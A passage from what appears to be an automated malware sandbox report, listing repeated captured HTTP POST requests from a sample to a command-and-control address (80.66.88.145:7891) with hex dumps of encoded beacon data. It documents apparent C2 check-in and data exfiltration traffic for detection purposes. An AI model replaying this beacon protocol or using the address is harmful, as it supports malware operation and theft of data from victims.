id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoSlcE76cEOrloOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 145Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnQIFHwC&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 524Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 65Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnQIFHwC&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 524Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 144Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 144Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
